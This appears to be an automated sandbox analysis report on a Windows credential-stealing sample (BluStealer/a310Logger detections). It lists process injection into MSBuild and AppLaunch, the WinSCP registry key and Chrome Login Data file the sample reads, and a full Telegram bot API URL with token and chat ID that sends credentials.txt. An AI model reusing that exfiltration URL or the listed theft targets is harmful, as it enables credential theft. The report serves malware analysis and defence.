Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected BluStealer
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Yara detected a310Logger
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
Yara detected ThunderFox Stealer
Source: Yara match File source: 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5848, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 679095 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 9 other signatures 2->36 7 SecuriteInfo.com.W32.AIDetectNet.01.19566.exe 1 2->7         started        process3 file4 20 SecuriteInfo.com.W...et.01.19566.exe.log, ASCII 7->20 dropped 38 Writes to foreign memory regions 7->38 40 Injects a PE file into a foreign processes 7->40 11 MSBuild.exe 1 7 7->11         started        15 MSBuild.exe 7->15         started        signatures5 process6 dnsIp7 22 api.telegram.org 149.154.167.220, 443, 49751 TELEGRAMRU United Kingdom 11->22 42 Writes to foreign memory regions 11->42 44 Allocates memory in foreign processes 11->44 46 Injects a PE file into a foreign processes 11->46 17 AppLaunch.exe 2 11->17         started        signatures8 process9 signatures10 24 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->24 26 Tries to steal Mail credentials (via file / registry access) 17->26 28 Tries to harvest and steal browser information (history, passwords, etc) 17->28
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
dual-a-0001.a-msedge.net 204.79.197.200 true
api.telegram.org 149.154.167.220 true
windowsupdatebg.s.llnwi.net 95.140.236.128 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot5446953292:AAFkDq-HVam91vjV2SXkAWjbhfkBnxaPoa4/sendDocument?chat_id=1269002131&caption=credentials.txt:::computer\user false
    		high